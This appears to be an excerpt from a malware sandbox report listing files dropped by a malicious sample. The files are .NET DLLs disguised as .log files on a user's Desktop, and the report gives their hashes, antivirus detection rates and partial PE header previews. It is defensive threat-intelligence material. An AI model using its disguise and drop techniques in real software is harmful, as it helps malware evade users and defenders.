                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\JMBKMsmH.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):64000
                                                Entropy (8bit):5.857602289000348
                                                Encrypted:false
                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\JiQSSPWn.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34304
                                                Entropy (8bit):5.618776214605176
                                                Encrypted:false
                                                SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                MD5:9B25959D6CD6097C0EF36D2496876249
                                                SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 4%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\MYHJZLWg.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):40448
                                                Entropy (8bit):5.7028690200758465
                                                Encrypted:false
                                                SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 12%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\OsAKJQVe.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):41472
                                                Entropy (8bit):5.6808219961645605
                                                Encrypted:false
                                                SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\PWlCEuly.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):294912
                                                Entropy (8bit):6.010605469502259
                                                Encrypted:false
                                                SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                MD5:00574FB20124EAFD40DC945EC86CA59C
                                                SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                C:\Users\user\Desktop\PjdKZeCh.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):85504
                                                Entropy (8bit):5.8769270258874755
                                                Encrypted:false
                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 71%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                C:\Users\user\Desktop\PvGkFmYz.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):85504
                                                Entropy (8bit):5.8769270258874755
                                                Encrypted:false
                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 71%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                C:\Users\user\Desktop\RunsezZZ.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):33792
                                                Entropy (8bit):5.541771649974822
                                                Encrypted:false
                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 38%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\SHQSLHwr.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):33792
                                                Entropy (8bit):5.541771649974822
                                                Encrypted:false
                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 38%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\SRkiCrbU.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):38400
                                                Entropy (8bit):5.699005826018714
                                                Encrypted:false
                                                SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                MD5:87765D141228784AE91334BAE25AD743
                                                SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\UswiSVHk.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):33280
                                                Entropy (8bit):5.634433516692816
                                                Encrypted:false
                                                SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 8%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\WgArDiDi.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34304
                                                Entropy (8bit):5.618776214605176
                                                Encrypted:false
                                                SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                MD5:9B25959D6CD6097C0EF36D2496876249
                                                SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 4%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\XMlAJXRO.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):32256
                                                Entropy (8bit):5.631194486392901
                                                Encrypted:false
                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\ZPYieGWJ.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):64000
                                                Entropy (8bit):5.857602289000348
                                                Encrypted:false
                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\ZeaApOeg.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):32256
                                                Entropy (8bit):5.631194486392901
                                                Encrypted:false
                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 25%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\asIaZkme.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34816
                                                Entropy (8bit):5.636032516496583
                                                Encrypted:false
                                                SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                MD5:996BD447A16F0A20F238A611484AFE86
                                                SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\cJayVGAz.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):342528
                                                Entropy (8bit):6.170134230759619
                                                Encrypted:false
                                                SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\ejzRghnX.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):36352
                                                Entropy (8bit):5.668291349855899
                                                Encrypted:false
                                                SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                MD5:94DA5073CCC14DCF4766DF6781485937
                                                SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\gdBhXhQN.log

                                                Download File
                                                Process:C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):24576
                                                Entropy (8bit):5.535426842040921
                                                Encrypted:false
                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 17%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                C:\Users\user\Desktop\gzRpdDAs.log

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):34816
                                                Entropy (8bit):5.636032516496583
                                                Encrypted:false
                                                SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                MD5:996BD447A16F0A20F238A611484AFE86
                                                SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
